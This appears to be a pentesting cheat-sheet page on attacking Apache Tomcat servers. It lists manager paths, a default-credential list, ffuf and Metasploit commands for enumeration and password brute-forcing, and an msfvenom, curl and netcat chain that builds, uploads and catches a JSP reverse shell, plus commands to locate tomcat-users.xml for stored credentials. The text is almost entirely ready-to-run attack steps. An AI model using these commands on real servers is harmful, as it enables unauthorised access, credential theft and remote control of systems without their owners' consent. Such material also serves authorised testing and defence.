Apache Tomcat Pentesting

Apache Tomcat is an implementation of the Jakarta Servlet, Jakarta Expression Language, and WebSocket technologies.

Directories

Below are common directories for Apache Tomcat.

/examples
/examples/jsp/cal/login.html
/examples/jsp/error/error.html
/examples/jsp/snp/snoop.jsp
/examples/servlet/HelloWorldEXample
/examples/servlet/JndiServlet
/examples/servlet/RequestHeaderExample
/examples/servlet/RequestInfoExample
/examples/servlet/RequestParamExample

/host-manager

/manager
/manager/jmxproxy/?qry=STUFF
/manager/status
/manager/status/all
# We can execute commands in /manager/text/ directory
/manager/text/{command}?{parameters}
/manager/text/deploy?path=/foo
/manager/text/list
/manager/text/resources
/manager/text/serverinfo
/manager/text/vminfo

Directory Discovery

To enumerate directories automatically, use fuzzing tools.

ffuf -u https://example.com/FUZZ -w directories.txt
ffuf -u https://example.com/host-manager/FUZZ -w 
ffuf -u https://example.com/manager/FUZZ -w directories.txt

Credentials

Below are common credentials for the manager app in Tomcat.

admin:(empty)
admin:admin
admin:password
admin:password1
admin:Password1
admin:tomcat
manager:manager
root:changethis
root:password
root:password1
root:root
root:r00t
root:toor
tomcat:(empty)
tomcat:admin
tomcat:changethis
tomcat:password
tomcat:password1
tomcat:s3cret
tomcat:tomcat

User Enumeration

# Metasploit
msf> use auxiliary/scanner/http/tomcat_enum
msf> set TARGETURI /manager  # depending on the website

Brute Force Credentials

ffuf -u https://tomcat:FUZZ@example.com/manager -w passwords.txt -fs 140

# Metasploit
msf> use auxiliary/scanner/http/tomcat_mgr_login
msf> set VHOST example.local
msf> set stop_on_success true
msf> set username tomcat
msf> set RHOSTS <target-ip>

Remote Code Execution (RCE)

Using Metasploit

msfconsole
msf> use exploit/multi/http/tomcat_mgr_upload

Uploading WAR file (Reverse Shell)

First create a war file using Msfvenom.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<local-ip> LPORT=80 -f war -o shell.war

Then upload this file.

curl --upload-file shell.war -u 'tomcat:password' "https://example.com/manager/text/deploy?path=/shell"

Start a listener in local machine.

sudo nc -lvnp 80

Now access to https://example.com/shell.

We should get a shell.

Investigation From Inside

If we are in the target system, we can retrieve information about credentials.

find / -name "tomcat-users.xml" 2>/dev/null
cat tomcat-users.xml

PreviousApache ActiveMQ Pentesting NextApache Zeppelin Pentesting

Last updated 1 month ago

hashtagDirectories

hashtagDirectory Discovery

hashtagCredentials

hashtagUser Enumeration

hashtagBrute Force Credentials

hashtagRemote Code Execution (RCE)

hashtagUsing Metasploit

hashtagUploading WAR file (Reverse Shell)

hashtagInvestigation From Inside